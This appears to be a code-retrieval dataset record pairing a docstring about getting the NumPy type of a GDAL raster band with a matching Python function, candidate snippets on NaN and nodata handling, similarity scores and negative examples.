str_to_date(\"2010-01-14\")\n end_date = str_to_date(\"2010-01-19\")\n\n data_array = self.bbg_provider.get_price(tickers, [PriceField.Close, PriceField.Volume], start_date, end_date,\n Frequency.DAILY)\n self.assertEqual(data_array.dtype, np.float64)", "def dropna(self) -> \"Dataset\":\n if not self[0]._has_time_axis: # type: ignore\n raise ValueError(\"Not available if no time axis!\")\n\n all_index: List[int] = []\n for i in range(self.n_items):\n x = self[i].to_numpy()\n\n # this seems overly complicated...\n axes = tuple(range(1, x.ndim))\n idx = list(np.where(~np.isnan(x).all(axis=axes))[0])\n if i == 0:\n all_index = idx\n else:\n all_index = list(np.intersect1d(all_index, idx))\n\n return self.isel(all_index, axis=0)", "def test_raster_float_nan_value():\n cvs = ds.Canvas(plot_height=2, plot_width=2, x_range=(0, 1), y_range=(0,1))\n array = np.array([[np.NaN, 1., 2., 3.], [4., np.NaN, 6., 7.], [8., 9., np.NaN, 11.]])\n coords = {'x': np.linspace(0, 1, 4), 'y': np.linspace(0, 1, 3)}\n xr_array = xr.DataArray(array, coords=coords, dims=['y', 'x'])\n\n agg = cvs.raster(xr_array, downsample_method='max')\n expected = np.array([[4, 7], [9, 11]])\n\n assert np.allclose(agg.data, expected)\n assert agg.data.dtype.kind == 'f'\n assert np.allclose(agg.x.values, np.array([0.25, 0.75]))\n assert np.allclose(agg.y.values, np.array([0.25, 0.75]))", "def test_nodata_value(self):\n\n # Read files with -9999 as nominated nodata value\n for filename in [os.path.join(TESTDATA, 'Population_2010_clip.tif'),\n os.path.join(HAZDATA,\n 'Lembang_Earthquake_Scenario.asc')]:\n\n R = read_layer(filename)\n A = R.get_data(nan=False)\n\n # Verify nodata value\n Amin = min(A.flat[:])\n msg = ('Raster must have -9999 as its minimum for this test. '\n 'We got %f for file %s' % (Amin, filename))\n assert Amin == -9999, msg\n\n # Verify that GDAL knows about this\n nodata = R.get_nodata_value()\n msg = ('File %s should have registered nodata '\n 'value %i but it was %s' % (filename, Amin, nodata))\n assert nodata == Amin, msg\n\n # Then try using numpy.nan\n A = R.get_data(nan=True)\n\n # Verify nodata value\n Amin = numpy.nanmin(A.flat[:])\n msg = ('True raster minimum must exceed -9999. '\n 'We got %f for file %s' % (Amin, filename))\n assert Amin > -9999, msg\n\n # Then try with a number\n A = R.get_data(nan=-100000)\n\n # Verify nodata value\n Amin = numpy.nanmin(A.flat[:])\n msg = ('Raster must have -100000 as its minimum for this test. '\n 'We got %f for file %s' % (Amin, filename))\n assert Amin == -100000, msg\n\n # Try with illegal nan values\n for illegal in [{}, (), [], None, 'a', 'oeuu']:\n try:\n R.get_data(nan=illegal)\n except InaSAFEError:\n pass\n else:\n msg = ('Illegal nan value %s should have raised '\n 'exception' % illegal)\n raise RuntimeError(msg)", "def raster_to_numpy_array(raster_data, as_single_band=True,\n old_nodata=None, new_nodata=None):\n bands = as_single_band + (1 - as_single_band) * raster_data.RasterCount\n nrow = raster_data.RasterYSize\n ncol = raster_data.RasterXSize\n dims = (bands, nrow, ncol)\n\n out_data_array = np.full(dims, np.nan)\n\n for i in range(bands):\n srcband = raster_data.GetRasterBand(i + 1)\n srcband_array = np.array(srcband.ReadAsArray().astype(np.float))\n if old_nodata is None:\n old_nodata = srcband.GetNoDataValue()\n if new_nodata is not None and old_nodata is not None:\n if np.isnan(old_nodata):\n srcband_array[np.isnan(srcband_array)] = new_nodata\n else:\n srcband_array[srcband_array == old_nodata] = new_nodata\n print('NoData: Replaced ' + str(old_nodata) +\n ' with ' + str(new_nodata))\n out_data_array[i, :, :] = srcband_array\n\n if as_single_band:\n return out_data_array[0, :, :]\n else:\n return out_data_array", "def isnan(data):\n return _make.isnan(data)", "def var_data_unc(self, index):\n data = np.ma.array(np.zeros(self.n_levels()), mask=True)\n if index is not None:\n for i in range(self.n_levels()):\n if self.profile_data[i]['variables'][index]['Missing'] or self.profile_data[i]['variables'][index]['Missing_unc']: continue\n data[i] = self.profile_data[i]['variables'][index]['Value_unc']\n return data", "def __array__(self):\n return pa.column(\"dummy\", self.data).to_pandas().values", "def getNoLabel(self):\n # TODO: this is a quick hack. We need another way to signify \"the empty label\"\n (itemtype, interval) = self.getLabelTypeAndInterval()\n return pynt.rangeset.RangeSet(None, itemtype=itemtype, interval=interval)", "def getNoLabel(self):\n # TODO: this is a quick hack. We need another way to signify \"the empty label\"\n (itemtype, interval) = self.getLabelTypeAndInterval()\n return pynt.rangeset.RangeSet(None, itemtype=itemtype, interval=interval)", "def data_missing() -> ExtensionArray:\n data_matrix = np.arange(\n 2 * 10 * 10 * 3,\n dtype=np.float_,\n ).reshape(2, 10, 10, 3)\n data_matrix[0, ...] = np.NaN\n grid_points = [\n np.arange(10),\n np.arange(10) / 10,\n ]\n\n return skfda.FDataGrid(data_matrix, grid_points=grid_points)", "def data_missing(basis: Basis) -> FDataBasis:\n coef_matrix = np.arange(\n 2 * basis.n_basis,\n dtype=np.float_,\n ).reshape(2, basis.n_basis)\n coef_matrix[0, :] = np.NaN\n\n return FDataBasis(basis=basis, coefficients=coef_matrix)", "def test_scalar_null(setup_teardown_file):\n f = setup_teardown_file[3]\n\n dset = f.create_dataset('x', shape=(), dtype='i1')\n out = dset[()]\n\n assert out.dtype == \"int8\"", "def data_missing_for_sorting(allow_in_pandas):\n return PandasArray(\n np.array([(1,), np.nan, (0,)])\n )", "def nonull(val):\n return val if not pd.isnull(val) else None", "def _nodata_mask(self):\n if self.nodata_value is None:\n return np.ones_like(self.array, dtype=np.bool)\n return self.array != self.nodata_value", "def getMask(self):\r\n mask = np.array(self.array, dtype=np.float32)\r\n mask[mask == 0] = np.nan\r\n return mask", "def band_count(self):\n return self.dataset.RasterCount if self.dataset else None", "def _pure_data(data, missing_mask):\n missing_rows = np.where(missing_mask)[0]\n pure_data = np.delete(data, missing_rows, axis=0)\n\n return pure_data", "def getNarrowbandIncandSignalLG(self):\r\n\t\treturn self.lowGainNarrowBandIncandData", "def nan_value(data):\n return data.isnull().any()", "def isnan(self):\n return self.isAny( (lambda x: np.isnan(x)) )", "def no_bin(image, *args, **kwargs):\n return image", "def remove_zero_bars(dgm):\r\n inds = dgm[:,0] != dgm[:,1]\r\n return dgm[inds,:]", "def get_missing(self):\n missing_values = self.df[self.col_name].isnull().sum()\n return missing_values", "def notna(self):\n return DataFrameDefault.register(pandas.DataFrame.notna)(self)", "def _get_missing_h5lmt(self, dataset_name, inverse=False):\n dataset = self.__getitem__(dataset_name)\n missing_dataset = self.get('/FSMissingGroup/FSMissingDataSet')\n if len(dataset.shape) == 1:\n result = numpy.zeros((dataset.shape[0], 1), dtype=numpy.int8)\n elif dataset.shape == missing_dataset.shape:\n result = missing_dataset[:, :].astype('i8').T\n else:\n result = numpy.zeros(dataset[:, :].shape, dtype=numpy.int8).T\n\n if inverse:\n return (~result.astype(bool)).astype('i8')\n return result", "def type(self):\n # type: () -> type\n return _python_type_map[str(self.xnd_dtype.hidden_dtype)]", "def no_reg(w):\n return np.zeros_like(w)", "def extract_unmasked_data(self,radar, field, bad=-32768):\n return radar.fields[field]['data'].filled(fill_value=bad)", "def mask(self, mask, logger=logger):\n if self.nodata is not None:\n da_masked = self._obj.where(mask != 0, self.nodata)\n else:\n logger.warning(\"Nodata value missing, skipping mask\")\n da_masked = self._obj\n return da_masked", "def extract_unmasked_data(radar, field, bad=-32768):\n return radar.fields[field]['data'].filled(fill_value=bad)", "def data_missing(data):\n return type(data)._from_sequence([None, data[0]])", "def getNarrowbandIncandSignal(self):\r\n\t\treturn self.narrowBandIncandData", "def test_single_null(setup_teardown_file):\n f = setup_teardown_file[3]\n\n dset = f.create_dataset('x', (1,), dtype='i1')\n out = dset[()]\n assert isinstance(out, np.ndarray)\n assert out.shape == (1,)", "def missing_values(dataset, inverse=False):\n zero = numpy.int8(0)\n one = numpy.int8(1)\n if inverse:\n converter = numpy.vectorize(lambda x:\n zero if (x == 0.0 and math.copysign(1, x) < 0.0) else one)\n else:\n converter = numpy.vectorize(lambda x:\n one if (x == 0.0 and math.copysign(1, x) < 0.0) else zero)\n return converter(dataset)", "def getNotHidden(self):\n return self.abudance_df[self.abundance_df['masked']==False]", "def GetOutputNarrowBand(self) -> \"itkVectorContainerUILSNF3_Pointer\":\n return _itkReinitializeLevelSetImageFilterPython.itkReinitializeLevelSetImageFilterIF3_GetOutputNarrowBand(self)", "def test_default_signal_nxdata(self, nexus_base):\n assert isinstance(nexus_base.default_signal, np.ndarray)", "def trend_none(self):\n raise NotImplementedError()", "def nan(klass):\n return RatTerm(RatNum(1, 0), 0)", "def __array__(self, dtype=None) -> np.ndarray:\n return self.values", "def nocoordinate(self):\n return self.__nocoordinate", "def non_gpu_data(self):\n\n return self._non_gpu_data", "def zero(self):\n q = pinocchio.neutral(self.model)\n v = np.zeros(self.model.nv)\n return np.concatenate([q.flat, v])", "def AB_zero_flux(self):\n return self._get_mean_and_samples_attribute('AB_zero_flux')", "def __array__(self, copy=None):\n return self.data.to_pandas().values", "def build_signal_dataset(self):\n return np.abs(self.bandpassed).mean(axis=-2)", "def GetOutputNarrowBand(self) -> \"itkVectorContainerUILSNF2_Pointer\":\n return _itkReinitializeLevelSetImageFilterPython.itkReinitializeLevelSetImageFilterIF2_GetOutputNarrowBand(self)", "def null(cls):\n return GXMXD()", "def usedbands(self):\n lc = self.lc\n return np.unique(np.asarray(lc['band']))", "def nid(x):\n return x.__array_interface__['data'][0]", "def _strip_nan(val):\n if isinstance(val, float) and np.isnan(val):\n return '__NaN__'\n elif isinstance(val, dict):\n return {key: Database._strip_nan(item) for key, item in list(val.items())}\n elif isinstance(val, list) or isinstance(val, tuple):\n return [Database._strip_nan(item) for item in val]\n elif isinstance(val, set):\n raise NotImplementedError\n return val", "def test_raster_integer_nan_value_padding():\n\n cvs = ds.Canvas(plot_height=3, plot_width=3, x_range=(0, 2), y_range=(0, 2))\n array = np.array([[9999, 1, 2, 3], [4, 9999, 6, 7], [8, 9, 9999, 11]])\n xr_array = xr.DataArray(array, coords={'x': np.linspace(0, 1, 4), 'y': np.linspace(0, 1, 3)}, dims=['y', 'x'])\n\n agg = cvs.raster(xr_array, downsample_method='max', nan_value=9999)\n expected = np.array([[4, 7, 9999], [9, 11, 9999], [9999, 9999, 9999]])\n\n assert np.allclose(agg.data, expected)\n assert agg.data.dtype.kind == 'i'\n assert np.allclose(agg.x.values, np.array([1/3., 1.0, 5/3.]))\n assert np.allclose(agg.y.values, np.array([1/3., 1.0, 5/3.]))", "def na_value():\n return pd.NA", "def nz(self):\n return self._dim[2]", "def remove_nan(self, dataframe):\n return dataframe.dropna()", "def ng(nanograms):\n return Unit(nanograms,\"nanogram\")", "def zero(self):\n if self._chart.manifold().base_field_type() in ['real', 'complex']:\n elt = SR.zero()\n else:\n elt = self._chart.manifold().base_field().zero()\n return self.element_class(self, elt)", "def remove_data(ds, nh_lim, sh_lim, time_max, lat_name='lat', time_name='time'):\n return xr.where((ds[lat_name] < nh_lim) &\n (ds[lat_name] > sh_lim) &\n (ds[time_name] < pd.to_datetime([time_max]).values),\n np.nan,\n ds)", "def df_nodal_flux(self):\n df_q = pd.DataFrame(index=self.masking_domain)\n df_q[\"q\"] = self.sdb.getNodalValues()\n df_q.dropna(subset=[\"q\"], inplace=True)\n return df_q.join(self.doc.c.mesh.df.nodes())", "def Vega_zero_flux(self):\n return self._get_mean_and_samples_attribute('Vega_zero_flux')", "def soleDataPoint(self):\n dps = self.datapoints()\n if dps:\n return dps[0]", "def tonumpy(self):\n import numpy\n from numpy import ma\n\n # initialize the return\n narray = None\n\n if None in self._data:\n\n # define a lambda function\n # to create the mask array\n make_mask = lambda x: x == None\n\n # create the numpy array,\n # making on the fly the mask\n narray = numpy.ma.array(self._data, mask=list(map(make_mask, self._data)))\n\n else:\n # convert the list to a numpy object\n narray = numpy.array(self._data)\n\n # return the numpy object\n return narray", "def get_tif(self, file='', band=1):\n Data = np.ndarray\n\n if band == '':\n band = 1\n\n f = gdal.Open(file)\n if f is not None:\n try:\n Data = f.GetRasterBand(band).ReadAsArray()\n except AttributeError:\n raise AttributeError('Band {band} not found.'.format(band=band))\n else:\n raise IOError('{} not found.'.format(file))\n\n return Data", "def getUndefinedDataAt(self, address: ghidra.program.model.address.Address) -> ghidra.program.model.listing.Data:\n ...", "def filter_nans(seq):\n return np.array([x for x in seq if not isinstance(x, float)])", "def oiDataIsNull(self):\n self.charts_1.getGV().hide()\n self.charts_2.getGV().hide()", "def replace_value(cls, data, nodata):\n data = data.astype('float64')\n mask = data != nodata\n if hasattr(data, 'where'):\n return data.where(mask, np.NaN)\n return np.where(mask, data, np.NaN)", "def readImage(self, imgfile, band):\n imgds = gdal.Open(imgfile, gdal.GA_ReadOnly)\n imgband = imgds.GetRasterBand(band)\n imgdata = imgband.ReadAsArray(0, 0, imgband.XSize, imgband.YSize)\n imgds = None\n return imgdata", "def unsetValue(self):\n return _libsbml.FluxBound_unsetValue(self)", "def missing_data(self, by='marker'):\n d = np.copy(self.geno).astype(float)\n d[d == -9] = np.nan\n if by == 'marker' or by == 0:\n return np.isnan(d[:,:,0]).mean(0)\n elif by == 'individual' or by == 1:\n return np.isnan(d[:,:,0]).mean(1)\n else:\n raise ValueError(\"`by` should be either 'marker' or 'individual'.\")", "def gdx_isnan(val,gdxf):\n return val in [SPECIAL_VALUES[0], SPECIAL_VALUES[1]]", "def get_bin_band_arr(self):\n\n fn = self._lib['cwtObj_getBinBandArr']\n fn.argtypes = [POINTER(OpaqueCWT)]\n fn.restype = c_void_p\n p = fn(self._obj)\n ret = np.frombuffer((c_int * self.num).from_address(p), np.int32).copy()\n return ret", "def notna(self):\n return super().notna()", "def getNZ(self):\n return self._get_nz( )" ]
[ "0.7544999", "0.7434405", "0.7288697", "0.6567842", "0.6520311", "0.6363698", "0.6319562", "0.62501335", "0.6163293", "0.61502856", "0.61502856", "0.61240387", "0.6110622", "0.60905856", "0.590359", "0.5895869", "0.58876556", "0.58424926", "0.58220965", "0.5796688", "0.5778561", "0.57269347", "0.5697276", "0.5692186", "0.5664606", "0.5648056", "0.5614599", "0.558892", "0.5553388", "0.5547773", "0.55438596", "0.55414027", "0.5538868", "0.5538868", "0.55292845", "0.5524298", "0.5514468", "0.551139", "0.5499059", "0.54568845", "0.54413116", "0.54289687", "0.5420883", "0.5406187", "0.5395783", "0.53955954", "0.5383611", "0.5383192", "0.5375553", "0.53724414", "0.53643703", "0.53610915", "0.53538567", "0.53507227", "0.53458756", "0.5337329", "0.53130645", "0.530204", "0.52835155", "0.5281505", "0.5280815", "0.5277185", "0.52676123", "0.5258759", "0.5258387", "0.5254711", "0.52536994", "0.52447087", "0.5226507", "0.5226414", "0.5220528", "0.52157587", "0.5213573", "0.52073765", "0.52072257", "0.52064055", "0.52026284", "0.519964", "0.5196084", "0.51917446", "0.518738", "0.51872295", "0.51862764", "0.51839083", "0.517904", "0.51716214", "0.5161016", "0.5160043", "0.515909", "0.5158713", "0.51535845", "0.5150214", "0.5147213", "0.51391715", "0.51378745", "0.51344496", "0.51323783", "0.5130883", "0.5112671", "0.5100205" ]
0.86186093
0
Returns the NumPy type associated with gdal.Band.DataType
def NumPyDataType(self): datatype = self.DataType if datatype == gdalconst.GDT_Byte: pixeltype = self.GetMetadataItem('PIXELTYPE', 'IMAGE_STRUCTURE') if pixeltype == 'SIGNEDBYTE': return numpy.int8 return numpy.uint8 elif datatype == gdalconst.GDT_UInt16: return numpy.uint16 elif datatype == gdalconst.GDT_UInt32: return numpy.uint32 elif datatype == gdalconst.GDT_Int16: return numpy.int16 elif datatype == gdalconst.GDT_Int32: return numpy.int32 elif datatype == gdalconst.GDT_Float32: return numpy.float32 elif datatype == gdalconst.GDT_Float64: return numpy.float64 else: raise ValueError( "Cannot handle DataType: {0}".format( gdal.GetDataTypeName(datatype) ) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_band_dtype(self, band_idx=1):\n if band_idx < 1 or band_idx > self.dataset.RasterCount:\n raise IndexError(\"band index is out of range\")\n return self.dataset.GetRasterBand(band_idx).DataType", "def type(self):\n # type: () -> type\n return _python_type_map[str(self.xnd_dtype.hidden_dtype)]", "def GetDataType(self):\n return _gmat_py.ElementWrapper_GetDataType(self)", "def get_data_type(self, idx):\n return(self.data[idx].dtype)", "def dtype(self):\n return self.dataset.dtype", "def dtype(self):\n return self._vars[0].dtype", "def _numpy_datatype_from_nd4j_context():\n nd4j_datatype = data_type()\n if nd4j_datatype == 'double':\n return np.float64\n elif nd4j_datatype == 'float':\n return np.float32\n elif nd4j_datatype == 'half':\n return np.float16", "def get_gdal_datatype(in_datatype):\n if in_datatype == 'float64':\n return gdalconst.GDT_Float64\n elif in_datatype == 'float32':\n return gdalconst.GDT_Float32\n elif in_datatype == 'int32':\n return gdalconst.GDT_Int32\n else:\n raise ValueError(\n 'Unrecognized data type in get_gdal_datatype():\\n {}'.format(\n in_datatype))", "def getDataType(self, label):\n\n try:\n return self._data[label].dtype\n except KeyError:\n return None", "def GetNoDataValue(self):\n result = super(Band, self).GetNoDataValue()\n if result is not None:\n return self.NumPyDataType(result)", "def dtype():\n return RaggedDtype()", "def dtype(self):\n return self._channel.datatype", "def dtype(self):\n return self._fl.raw.dtype", "def dtype(self):\n return self.data.dtype", "def type(self):\n return _python_type_map[self.arrow_dtype.id]", "def datatype_name(self):\n return 'array'", "def dtype(self):\n return self._data.dtype", "def dtype(self):\n return self._data.dtype", "def dtype(self):\n return self.array.dtype", "def nptype2gdal(dtype):\n if dtype == np.float32:\n return gdal.GDT_Float32\n elif dtype == np.float64:\n return gdal.GDT_Float64\n elif dtype == np.int32:\n return gdal.GDT_Int32\n elif dtype == np.bool or dtype == np.uint8:\n return gdal.GDT_Byte\n return gdal.GDT_Float64", "def kind(self):\n # type () -> str\n return np.dtype(self.type).kind", "def data_type(self):\n try:\n return self.attributes.workspace.attributes['library:datatype']['items']\n except Exception as e:\n self._logger.debug(f\"data_category {e}\")\n return None", "def data_type():\n return DataTypeUtil.getDTypeForName(DataTypeUtil.getDtypeFromContext())", "def dtype(self):\n return self._dtype", "def dtype(self) -> DtypeLike:\n\n return self.data.dtype", "def datatype(self):\n # datatype is type of first dataarg\n return self[self.dataargs()[0]].typename", "def dtype(a):\n return a.dtype", "def dtype(self) -> DataType:\n return self._dtype", "def dtype(self):\n return self.MJD.dtype", "def dtype(self):\n return self.config[\"dtype\"]", "def type(self) -> DataType:\n return self._type", "def numpy_type(sqltype):\n m = re.match(\"char\\(([0-9]+)\\)\", sqltype.strip())\n if m is not None:\n # It's a string\n return np.dtype(\"|S\"+m.group(1))\n else:\n # It's a numeric type\n if sqltype == \"integer\" or sqltype == \"int\":\n return np.int32\n elif sqltype == \"bigint\":\n return np.int64\n elif sqltype == \"real\":\n return np.float32\n elif sqltype == \"float\":\n return np.float64\n else:\n raise ValueError(\"Unsupported data type \"+sqltype)", "def data_type(self):\r\n return self._data_type", "def dtype(self):\n return self._dtype", "def dtype(self):\n return self._dtype", "def dtype(self):\n return self._dtype", "def getDataType(self):\n\n return self._dataType", "def dtype(self):\n # type: () -> ExtensionDtype\n return self._dtype", "def dtype(self) -> str:\n return self._dtype", "def get_dtype(arr, backend='autograd'):\n if backend == 'pytorch':\n return pytorch_dtype_query_mapping_dict[arr.dtype]\n elif backend == 'autograd':\n return str(arr.dtype)", "def dtype(self):\n if self.num_polygons < 2 ** 8:\n dtype = numpy.uint8\n elif self.num_polygons < 2 ** 16:\n dtype = numpy.uint16\n else:\n dtype = numpy.uint32\n return dtype", "def data_type(self):\n return self._data_type", "def data_type(self):\n return self._data_type", "def data_type(self):\n return self._data_type", "def dtype(self) -> np.dtype:\n return self._channel_arrays[0].dtype", "def dtype(basis: Basis) -> FDataBasisDType:\n return FDataBasisDType(basis=basis)", "def typecode (self) :\r\n return self.numeric_typecode", "def type(self):\n return struct.unpack('<B', self.raw_data[0])[0]", "def _nd4j_datatype_from_np_array(array):\n return _nd4j_datatype_from_np(array.dtype.name)", "def type(self) -> np.dtype:\n return self._tensorInfo.dtype", "def GetType(vDataSet):\r\n return imaris_types[str(vDataSet.GetType())]", "def type(self) -> 'Data_Type':\n return Data_Type(self._info.htype, self._info.ptype)", "def dtype(self):\n return self.__dtype", "def getTypeCode(self):\n return _libsbml.Dimensions_getTypeCode(self)", "def data_type(self) -> pulumi.Input['AssetModelDataType']:\n return pulumi.get(self, \"data_type\")", "def to_numpy(self) -> np.dtype:\n return self._numpy_type", "async def get_dtype(self):\r\n pass", "def data_type(x):\n return (\n DATA_TYPES.get(file_format(x)) or\n DATA_TYPES.get(genomic_file_ext(x))\n )", "def dataType(self, data):\n if isinstance(data,str):\n return STRING\n elif isinstance(data,dict):\n return ASSOC\n elif isinstance(data,int) or isinstance(data,float):\n return STRING\n elif is_python2() and isinstance(data,long):\n return STRING\n elif isinstance(data, SpecArray.SpecArrayData):\n self.rows, self.cols = data.shape\n return data.type", "def dtype(self) -> np.dtype:\n ...", "def getDataSetType(self):\n return self.__data_set_type__", "def np_dtype(dali_dtype):\n return numpy.dtype(dali_dtype)", "def datatype(self) -> MetricTypeEnum:\n return self._datatype", "def dtype(self) -> tf.dtypes.DType:", "def datatype(self):\n return self._datatype", "def data_type(self) -> int:\n return self.data[\"args\"][\"dataType\"]", "def dtype(self) -> Type[DTypeFloat]:\n\n return self._dtype", "def type(self):\n # easy enough\n return self._dataset._pyre_id.type", "def dtype(self) -> np.dtype:\n return self._dtype", "def datatype(self):\n hcell = self._get_hcell2()\n celltype = hcell[\"celltype\"]\n assert celltype == \"structured\"\n return hcell[\"datatype\"]", "def dtype(self):\n return self.initial_value.dtype", "def recarrtype(self):\n return str(self.dtype.shape) + self.dtype.base.str[1:]", "def type(self):\n return self.data.type", "def data_type(self):\n return self.unpack_dword(0xC) & DEVPROP_MASK_TYPE", "def _dtype(self):\n if self._dtype_ is not None:\n return self._dtype_\n dtype = None\n for raw_extra, filename in zip(self._raw_extras, self._filenames):\n for ent in raw_extra[\"ent\"]:\n if ent is not None:\n with _fiff_get_fid(filename) as fid:\n fid.seek(ent.pos, 0)\n tag = read_tag_info(fid)\n if tag is not None:\n if tag.type in (\n FIFF.FIFFT_COMPLEX_FLOAT,\n FIFF.FIFFT_COMPLEX_DOUBLE,\n ):\n dtype = np.complex128\n else:\n dtype = np.float64\n if dtype is not None:\n break\n if dtype is not None:\n break\n if dtype is None:\n raise RuntimeError(\"bug in reading\")\n self._dtype_ = dtype\n return dtype", "def get_data_type(self, col):\n if ((self.data_df[col].dtype == np.int64) or (self.data_df[col].dtype == np.int32)):\n return 'int'\n elif ((self.data_df[col].dtype == np.float64) or (self.data_df[col].dtype == np.float32)):\n return 'float'\n else:\n raise ValueError(\"Unknown data type of feature %s: must be int or float\" % col)", "def basetype(series):\n if not series.dtype == types.ObjectType:\n # Type is specific already; return it without further inspection.\n return series.dtype\n # Now type is Object (string) See if any more specific type can be deduced:", "def astype(self, dtype):\n return type(self)(self.data.astype(dtype), self.bset)", "def form_datatype(self):\n et = get_lh5_element_type(self)\n return 'array<1>{array<1>{' + et + '}}'", "def _determine_dtype(self, b):\n if 64 < b or 1 > b:\n raise ValueError('b-Bit size must be 1 <= b <= 64')\n elif b > 32:\n return np.int64\n elif b > 16:\n return np.int32\n elif b > 8:\n return np.int16\n elif b > 1:\n return np.int8\n return np.bool", "def dtype(self) -> np.dtype[np.void]:\n return np.dtype(list(self.items()))", "def dtype_type( dtype, name = None ):\n if name:\n for property in dtype.descr:\n if property[ 0 ] == name:\n return property[ 1 ]\n raise ValueError( \"Property not found\" )\n else:\n if len( dtype.descr ) > 1:\n raise ValueError( \"Multiple types present\" )\n\n return dtype.descr[ 0 ][ 1 ]", "def get_var_type(self, var_name):\n return str(self.get_value_ref(var_name).dtype)", "def ogrtype2npytype(ogrtype):\n if ogrtype == ogr.OFTReal:\n return np.float64\n elif ogrtype == ogr.OFTInteger:\n return np.int32\n raise TypeError(\"OGR type cannot be mapped to a numpy dtype.\")", "def kind(self):\n # type () -> str\n if pa.types.is_date(self.arrow_dtype):\n return \"O\"\n else:\n return np.dtype(self.arrow_dtype.to_pandas_dtype()).kind", "def datatype(f):\n from numpy import bool, uint8, uint16, int32\n code = f.dtype\n if code == bool: type='binary'\n elif code == uint8: type='uint8'\n elif code == uint16: type='uint16'\n elif code == int32: type='int32'\n else:\n assert 0,'Does not accept this typecode: %s' % code\n return type", "def get_dimension_type(self, dim):\n dim = self.get_dimension(dim)\n if dim is None:\n return None\n elif dim.type is not None:\n return dim.type\n elif dim in self.vdims:\n return np.float64\n return self.interface.dimension_type(self, dim)", "def test_out_dtype(self):\n byt = bytscl(self.array1)\n dtype = byt.dtype\n self.assertEqual(dtype, 'uint8')", "def arrayToGLType( cls, value ):\n typeCode = value.dtype\n constant = ARRAY_TO_GL_TYPE_MAPPING.get( typeCode )\n if constant is None:\n raise TypeError(\n \"\"\"Don't know GL type for array of type %r, known types: %s\\nvalue:%s\"\"\"%(\n typeCode, list(ARRAY_TO_GL_TYPE_MAPPING.keys()), value,\n )\n )\n return constant", "def get_sensor_type(self):\n return self.data[1][:-1]", "def base_dtype(self):\r\n _base_dtype = [\r\n (ptidCol, '<i8'),\r\n (surveyidCol, 'S25'),\r\n (siteCol, 'S10'),\r\n (tranCol, '<i4'),\r\n (datetimeCol, '<M8[us]'),\r\n (dateCol, 'S12'),\r\n (timeCol, 'S11'),\r\n (latCol, '<f8'),\r\n (lonCol, '<f8'),\r\n (depObsCol, '<f8'),\r\n (depInterpCol, '<f8'),\r\n (videoCol, '<i4'),\r\n ]\r\n return _base_dtype", "def data_type_spec(self) -> Optional[pulumi.Input['AssetModelDataTypeSpec']]:\n return pulumi.get(self, \"data_type_spec\")", "def pixeltype(self):\n return _image.image_pixeltype(self)", "def data_type_id(self) -> str:\n return self._data_type_id", "def dtype_to_type(dtype) -> Type:\n if dtype == np.object:\n return str\n else:\n return type(np.zeros(1, dtype).item())", "def get_dtype(col):\n dtype = col.dtype\n\n if isinstance(dtype, CategoricalDtype):\n col = col.astype(type(col.values[0]))\n out = get_dtype(col)\n elif np.issubdtype(dtype, np.floating):\n out = 'float32'\n elif np.issubdtype(dtype, np.integer):\n if col.max() < 32767:\n out = 'int16'\n else:\n out = 'int32'\n elif np.issubdtype(dtype, np.object_):\n size = int(col.astype(str).str.len().max())\n out = 'S{:}'.format(size)\n else:\n out = dtype\n\n return out", "def convert_numpy_type(cls, dtype):\n\n import numpy as np\n\n m = {\n 'int64': cls.DATATYPE_INTEGER64,\n 'float64': cls.DATATYPE_FLOAT,\n 'object': cls.DATATYPE_TEXT # Hack. Pandas makes strings into object.\n\n }\n\n t = m.get(dtype.name, None)\n\n if not t:\n raise TypeError(\n \"Failed to convert numpy type: '{}' \".format(\n dtype.name))\n\n return t", "def geometry_type(number):\n try:\n return GDAL_GEOMETRY_TYPES[number]\n except KeyError:\n return", "def datatype(parameter):\n return type(parameter)", "def dtype_ref(self):\n return self._dtype_ref" ]
[ "0.7380224", "0.7158212", "0.6904815", "0.68386203", "0.67266405", "0.6708839", "0.66951716", "0.663477", "0.663243", "0.6614309", "0.6602418", "0.6594213", "0.65762633", "0.65756744", "0.65720206", "0.657198", "0.6555877", "0.6555877", "0.6546687", "0.65154874", "0.6515137", "0.6498225", "0.6493472", "0.6466837", "0.6455337", "0.6454839", "0.6453198", "0.6451606", "0.643996", "0.6423948", "0.64215165", "0.64212596", "0.640249", "0.6401839", "0.6401839", "0.6401839", "0.6401397", "0.6385074", "0.63768667", "0.6376779", "0.6369398", "0.63643914", "0.63643914", "0.63643914", "0.63552743", "0.63526255", "0.6332715", "0.6330258", "0.62927747", "0.627919", "0.6273387", "0.62716174", "0.62577516", "0.62504685", "0.6245434", "0.62114185", "0.62076026", "0.61964643", "0.61881423", "0.6175947", "0.6168868", "0.6151739", "0.61351687", "0.6133396", "0.6118896", "0.6083055", "0.60808295", "0.6067263", "0.60625273", "0.6040692", "0.6025394", "0.6008395", "0.6007711", "0.5972361", "0.59317416", "0.5924599", "0.591985", "0.58971864", "0.5857541", "0.585655", "0.5846714", "0.58189565", "0.5803598", "0.57848287", "0.5770629", "0.57440484", "0.57424396", "0.57290524", "0.57259095", "0.5721711", "0.5702034", "0.568362", "0.5680798", "0.5676757", "0.5650429", "0.5647226", "0.56313425", "0.56152123", "0.56072325", "0.55883914" ]
0.76264346
0
Returns the minimum value that can be stored in this band
def MinimumValue(self): datatype = self.NumPyDataType if issubclass(datatype, numpy.integer): return numpy.iinfo(datatype).min elif issubclass(datatype, numpy.floating): return -numpy.inf else: raise TypeError("Cannot handle DataType: {0}".format(datatype))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def min(self):\n if self.kind == 'u':\n return 0\n else:\n try:\n val = iinfo._min_vals[self.key]\n except KeyError:\n val = int(-(1 << (self.bits-1)))\n iinfo._min_vals[self.key] = val\n return val", "def min(self):\n if self.kind == 'u':\n return 0\n else:\n try:\n val = iinfo._min_vals[self.key]\n except KeyError:\n val = int(-(1 << (self.bits-1)))\n iinfo._min_vals[self.key] = val\n return val", "def _get_minimum(self):\n return self._minimum", "def minimum_value(self):\n return self._fitness[self._minidx]", "def MinimumValue(self):\n return self._fitness[self._minIndex]", "def _get_minimum_value(self):\n if hasattr(self, '_minimum_value'):\n return self._minimum_value\n return None", "def _minimum(self) -> float:\n if self._type == \"power\":\n return 1.0\n elif self._type == \"setpoint\":\n return self._product.get_data_config_json()[\"_value_setpoint_min\"]\n elif self._type == \"fan1\":\n fan = 1\n return self._product.get_data_config_json()[\"_value_fan_limits\"][\n ((fan - 1) * 2)\n ]\n elif self._type == \"fan2\":\n fan = 2\n return 